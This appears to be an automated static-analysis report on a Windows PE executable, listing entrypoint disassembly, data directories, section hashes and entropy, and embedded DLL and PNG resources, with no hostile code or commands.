                                                                                                                                                                                                                                                                                                                                                                                        Entrypoint Preview

                                                                                                                                                                                                                                                                                                                                                                                        Instruction
                                                                                                                                                                                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                                                                                                                                                                                        sub esp, 28h
                                                                                                                                                                                                                                                                                                                                                                                        call 00007F25B4D6856Ch
                                                                                                                                                                                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                                                                                                                                                                                        add esp, 28h
                                                                                                                                                                                                                                                                                                                                                                                        jmp 00007F25B4D677AFh
                                                                                                                                                                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                                                                                                                                                                        nop word ptr [eax+eax+00000000h]
                                                                                                                                                                                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                                                                                                                                                                                        cmp ecx, dword ptr [000EFBD9h]
                                                                                                                                                                                                                                                                                                                                                                                        jne 00007F25B4D67945h
                                                                                                                                                                                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                                                                                                                                                                                        rol ecx, 10h
                                                                                                                                                                                                                                                                                                                                                                                        test cx, FFFFh
                                                                                                                                                                                                                                                                                                                                                                                        jne 00007F25B4D67935h
                                                                                                                                                                                                                                                                                                                                                                                        ret
                                                                                                                                                                                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                                                                                                                                                                                        ror ecx, 10h
                                                                                                                                                                                                                                                                                                                                                                                        jmp 00007F25B4D67F94h
                                                                                                                                                                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                                                                                                                                                                        inc eax
                                                                                                                                                                                                                                                                                                                                                                                        push ebx
                                                                                                                                                                                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                                                                                                                                                                                        sub esp, 20h
                                                                                                                                                                                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                                                                                                                                                                                        lea eax, dword ptr [000976C7h]
                                                                                                                                                                                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                                                                                                                                                                                        mov ebx, ecx
                                                                                                                                                                                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                                                                                                                                                                                        mov dword ptr [ecx], eax
                                                                                                                                                                                                                                                                                                                                                                                        test dl, 00000001h
                                                                                                                                                                                                                                                                                                                                                                                        je 00007F25B4D6793Ch
                                                                                                                                                                                                                                                                                                                                                                                        mov edx, 00000018h
                                                                                                                                                                                                                                                                                                                                                                                        call 00007F25B4BA054Fh
                                                                                                                                                                                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                                                                                                                                                                                        mov eax, ebx
                                                                                                                                                                                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                                                                                                                                                                                        add esp, 20h
                                                                                                                                                                                                                                                                                                                                                                                        pop ebx
                                                                                                                                                                                                                                                                                                                                                                                        ret
                                                                                                                                                                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                                                                                                                                                                        inc eax
                                                                                                                                                                                                                                                                                                                                                                                        push edi
                                                                                                                                                                                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                                                                                                                                                                                        sub esp, 30h
                                                                                                                                                                                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                                                                                                                                                                                        mov dword ptr [esp+20h], FFFFFFFEh
                                                                                                                                                                                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                                                                                                                                                                                        mov dword ptr [esp+40h], ebx
                                                                                                                                                                                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                                                                                                                                                                                        mov dword ptr [esp+48h], esi
                                                                                                                                                                                                                                                                                                                                                                                        mov edx, 00000FA0h
                                                                                                                                                                                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                                                                                                                                                                                        lea ecx, dword ptr [000FC48Bh]
                                                                                                                                                                                                                                                                                                                                                                                        call dword ptr [0003AA55h]
                                                                                                                                                                                                                                                                                                                                                                                        nop
                                                                                                                                                                                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                                                                                                                                                                                        lea ecx, dword ptr [000976ADh]
                                                                                                                                                                                                                                                                                                                                                                                        call dword ptr [0003AB1Fh]
                                                                                                                                                                                                                                                                                                                                                                                        nop
                                                                                                                                                                                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                                                                                                                                                                                        mov ebx, eax
                                                                                                                                                                                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                                                                                                                                                                                        test eax, eax
                                                                                                                                                                                                                                                                                                                                                                                        jne 00007F25B4D6794Ch
                                                                                                                                                                                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                                                                                                                                                                                        lea ecx, dword ptr [000409FFh]
                                                                                                                                                                                                                                                                                                                                                                                        call dword ptr [00000009h]

                                                                                                                                                                                                                                                                                                                                                                                        Data Directories

                                                                                                                                                                                                                                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x2b46500x1a4.rdata
                                                                                                                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x2e10000x18ced0.rsrc
                                                                                                                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x2c90000x17ef8.pdata
                                                                                                                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x276a400x70.rdata
                                                                                                                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x276bb00x28.rdata
                                                                                                                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x276ab00x100.rdata
                                                                                                                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x2050000x1598.rdata
                                                                                                                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                                                                                                                                                        Sections

                                                                                                                                                                                                                                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                                                                                                                                                        .text0x10000x203a840x203c0055b33a0057eb1249062d404be6f3c191unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                                                                                                        .rdata0x2050000xb3d380xb3e00ff7e3f5077be3fcdc08c5cefe3b61d4cFalse0.2822516721681723data4.503762467408248IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                                                                                                        .data0x2b90000xff280x82002f1ce6f3cad070fb35415b8819bef07cFalse0.19435096153846154DIY-Thermocam raw data (Lepton 2.x), scale -10205-9792, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 214.2548684.149010331740686IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                                                                                                                        .pdata0x2c90000x17ef80x180008bf150e7a62f97a619c3cdc82be98ce0False0.5033976236979166data6.127219429376976IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                                                                                                        .rsrc0x2e10000x18ced00x18d0009c8c5f222f38bacdf70cf40cfe0a5854False0.5891008737405542data7.435885059265607IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                                                                                                        .reloc0x46e0000x9e0000x9d0000a7ec46257812d1e3d4161a390673ed1False0.8984857061106688data7.909171977386322IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                                                                                                                                                                                                                                                                                                                        Resources

                                                                                                                                                                                                                                                                                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                                                                                                                                                        DLL0x2f59280x1b600PE32 executable (DLL) (GUI) Intel 80386, for MS WindowsEnglishUnited States0.4680543664383562
                                                                                                                                                                                                                                                                                                                                                                                        DLL0x310f280x1de00PE32+ executable (DLL) (GUI) x86-64, for MS WindowsEnglishUnited States0.46928118462343094
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x338d080x77PNG image data, 4 x 4, 8-bit/color RGB, non-interlacedEnglishUnited States0.9915966386554622
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3356480x2f5PNG image data, 70 x 23, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0145310435931307
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x335bc80x301PNG image data, 70 x 31, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0143042912873863
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3359400x287PNG image data, 70 x 23, 8-bit/color RGBA, non-interlacedEnglishUnited States1.017001545595054
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3385b80x36ePNG image data, 22 x 40, 8-bit/color RGB, non-interlacedEnglishUnited States1.0125284738041003
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3374d00x15dPNG image data, 55 x 22, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0315186246418337
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3376300x13ePNG image data, 55 x 22, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0345911949685536
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3377700x115PNG image data, 30 x 24, 8-bit/color RGB, non-interlacedEnglishUnited States1.03971119133574
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3378880x12aPNG image data, 20 x 40, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0302013422818792
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3372c00x20cPNG image data, 10 x 28, 8-bit/color RGB, non-interlacedEnglishUnited States1.0209923664122138
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x338c080xfdPNG image data, 10 x 28, 8-bit/color RGB, non-interlacedEnglishUnited States1.0276679841897234
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3389280xa6PNG image data, 7 x 7, 8-bit/color RGB, non-interlacedEnglishUnited States1.0120481927710843
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3389d00x7cPNG image data, 3 x 11, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9919354838709677
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x338a500x96PNG image data, 9 x 8, 8-bit/color RGB, non-interlacedEnglishUnited States1.0133333333333334
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x338ae80x91PNG image data, 9 x 8, 8-bit/color RGB, non-interlacedEnglishUnited States1.006896551724138
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x338b800x84PNG image data, 15 x 3, 8-bit/color RGB, non-interlacedEnglishUnited States0.9848484848484849
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x34c7d00xa3PNG image data, 7 x 7, 8-bit/color RGB, non-interlacedEnglishUnited States1.0122699386503067
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3482180x771PNG image data, 13 x 156, 8-bit/color RGB, non-interlacedEnglishUnited States1.005774278215223
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x342bb80x697PNG image data, 52 x 268, 8-bit/color RGBA, non-interlacedEnglishUnited States1.006520450503853
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3432500x342PNG image data, 30 x 16, 8-bit/color RGBA, non-interlacedEnglishUnited States1.013189448441247
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x34c3700x45fPNG image data, 24 x 72, 8-bit/color RGB, non-interlacedEnglishUnited States1.0098302055406614
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x348b600x1a3PNG image data, 20 x 12, 8-bit/color RGBA, non-interlacedEnglishUnited States1.026252983293556
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3457200xac8PNG image data, 24 x 132, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0039855072463768
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3461e80x37cPNG image data, 8 x 88, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0123318385650224
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3473380xa50PNG image data, 24 x 132, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0041666666666667
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x347d880x48ePNG image data, 9 x 88, 8-bit/color RGBA, non-interlacedEnglishUnited States1.009433962264151
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3465680xa50PNG image data, 24 x 132, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0041666666666667
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x346fb80x380PNG image data, 8 x 88, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0122767857142858
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x33da700xab0PNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0040204678362572
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x33efb00xb1fPNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0038637161924833
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x33e5200xa8ePNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0040710584752035
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x33fad00xb30PNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.003840782122905
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3416f00x3a6PNG image data, 48 x 12, 8-bit/color RGBA, non-interlacedEnglishUnited States1.011777301927195
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x341a980x111bPNG image data, 38 x 114, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0025119890385932
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x343e600x3d1PNG image data, 23 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0112589559877174
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3442380x21bPNG image data, 11 x 88, 8-bit/color RGB, non-interlacedEnglishUnited States1.0204081632653061
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3444580xb12PNG image data, 50 x 273, 8-bit/color RGBA, non-interlacedEnglishUnited States1.003881439661256
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x344f700x7acPNG image data, 50 x 162, 8-bit/color RGBA, non-interlacedEnglishUnited States1.005600814663951
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3409a80xd43PNG image data, 50 x 264, 8-bit/color RGB, non-interlacedEnglishUnited States1.003240058910162
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3406000x3a4PNG image data, 22 x 88, 8-bit/color RGBA, non-interlacedEnglishUnited States1.011802575107296
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x34c9300x320PNG image data, 14 x 246, 8-bit/color RGBA, non-interlacedEnglishUnited States1.01375
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x34cc500x31fPNG image data, 14 x 246, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0137672090112642
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3492500x2bdPNG image data, 15 x 80, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0156918687589158
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x348fd80x273PNG image data, 15 x 76, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0175438596491229
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x348d080x2c9PNG image data, 15 x 84, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0154277699859748
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3489f80x163PNG image data, 70 x 66, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0112676056338028
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3495100x152PNG image data, 41 x 36, 8-bit/color RGBA, non-interlacedEnglishUnited States1.032544378698225
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3435980x38aPNG image data, 64 x 26, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0121412803532008
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3439280x532PNG image data, 64 x 26, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0082706766917293
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x33b2f80x19cPNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States0.8810679611650486
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x33b4980x2296PNG image data, 72 x 125, 8-bit/color RGBA, non-interlacedEnglishUnited States1.001242376327084
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3599100x69ePNG image data, 52 x 268, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0064935064935066
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x35c9500x1c4PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States0.8252212389380531
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x35c4280x522PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.008371385083714
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x359fb00x2475PNG image data, 76 x 125, 8-bit/color RGBA, non-interlacedEnglishUnited States1.000750026786671
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3566c80x69ePNG image data, 52 x 268, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0064935064935066
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3597480x1c3PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States0.8314855875831486
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3592400x505PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0085603112840467
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x356d680x24d3PNG image data, 76 x 125, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0004243131430997
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x35cb180x69ePNG image data, 52 x 268, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0064935064935066
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x35fbe00x1c7PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States0.832967032967033
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x35f6a80x536PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0082458770614693
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x35d1b80x24f0PNG image data, 76 x 125, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0011632825719121
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3504880x69ePNG image data, 52 x 268, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0064935064935066
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3533e00x1c5PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States0.8388520971302428
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x352f000x4d9PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.008863819500403
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x350b280x23d3PNG image data, 76 x 125, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x34cf700x189PNG image data, 100 x 34, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0279898218829517
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x34d1000x1bcPNG image data, 100 x 136, 8-bit/color RGBA, non-interlacedEnglishUnited States0.7027027027027027
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x34d3880x69ePNG image data, 52 x 268, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0064935064935066
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3502c00x1c4PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States0.827433628318584
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x34fdd00x4efPNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0087094220110848
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x34da280x23a2PNG image data, 76 x 125, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0007673755755317
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x34d2c00xc5PNG image data, 3 x 26, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0253807106598984
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x35fda80x69ePNG image data, 52 x 268, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0064935064935066
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x362e400x1baPNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States0.8212669683257918
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3629580x4e4PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0087859424920127
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3604480x250fPNG image data, 76 x 125, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0005270369979973
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3535a80x69ePNG image data, 52 x 268, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0064935064935066
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3565000x1c2PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States0.8288888888888889
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3560100x4e9PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0087509944311854
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x353c480x23c6PNG image data, 76 x 125, 8-bit/color RGBA, non-interlacedEnglishUnited States1.000436776588775
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x34c8780xb5PNG image data, 15 x 15, 8-bit/color RGB, non-interlacedEnglishUnited States1.0165745856353592
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x33d8e80x186PNG image data, 100 x 34, 8-bit/color RGBA, non-interlacedEnglishUnited States1.028205128205128
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x33d7300x1b5PNG image data, 100 x 136, 8-bit/color RGBA, non-interlacedEnglishUnited States0.6864988558352403
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3489900x66PNG image data, 1 x 46, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9803921568627451
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x34a7a80xf9PNG image data, 90 x 12, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0321285140562249
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x34aba80x17c3PNG image data, 86 x 240, 8-bit/color RGBA, non-interlacedEnglishUnited States0.992931119513398
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x34a8a80x283PNG image data, 86 x 8, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0171073094867806
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x34ab300x71PNG image data, 5 x 8, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9823008849557522
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x34a0880x71dPNG image data, 16 x 48, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0060406370126305
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3498f00x794PNG image data, 16 x 48, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0056701030927835
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3496680x284PNG image data, 7 x 39, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0170807453416149
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x335ed00x203PNG image data, 70 x 23, 8-bit/color RGBA, non-interlacedEnglishUnited States1.021359223300971
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3360d80x1b5PNG image data, 70 x 23, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0251716247139588
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3363680xb2PNG image data, 2 x 20, 8-bit/color RGB, non-interlacedEnglishUnited States1.0168539325842696
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3362900xd1PNG image data, 11 x 11, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9760765550239234
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3364200x21cPNG image data, 21 x 42, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0203703703703704
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3366400x21cPNG image data, 21 x 42, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0203703703703704
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3368600x1aePNG image data, 21 x 84, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0186046511627906
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x336a100x13aPNG image data, 16 x 56, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0222929936305734
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x336cf80x13fPNG image data, 21 x 84, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0344827586206897
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x336e380x135PNG image data, 16 x 56, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9967637540453075
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x336b500xdbPNG image data, 21 x 84, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0228310502283104
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x336c300xc6PNG image data, 16 x 56, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0252525252525253
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x336f700x1a9PNG image data, 21 x 84, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0141176470588236
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3371200x19bPNG image data, 16 x 56, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0194647201946472
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x338f200x2296PNG image data, 72 x 125, 8-bit/color RGBA, non-interlacedEnglishUnited States1.001242376327084
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x33b1b80x13ePNG image data, 72 x 15, 8-bit/color RGB, non-interlacedEnglishUnited States1.0345911949685536
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x338e080x115PNG image data, 30 x 24, 8-bit/color RGB, non-interlacedEnglishUnited States1.03971119133574
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x338d800x83PNG image data, 35 x 3, 8-bit/color RGB, non-interlacedEnglishUnited States1.0076335877862594
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3384e80xcePNG image data, 7 x 7, 8-bit/color RGB, non-interlacedEnglishUnited States1.0242718446601942
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3379b80xb30PNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.003840782122905
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x36b4700x25fPNG image data, 72 x 22, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0181219110378912
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x36b2580x79PNG image data, 4 x 4, 8-bit/color RGB, non-interlacedEnglishUnited States0.9752066115702479
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x367b100x170PNG image data, 70 x 23, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9755434782608695
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x367d880x26bPNG image data, 70 x 31, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0177705977382876
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x367c800x105PNG image data, 70 x 23, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9731800766283525
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x36ad880xe6PNG image data, 22 x 38, 8-bit/color RGB, non-interlacedEnglishUnited States1.0260869565217392
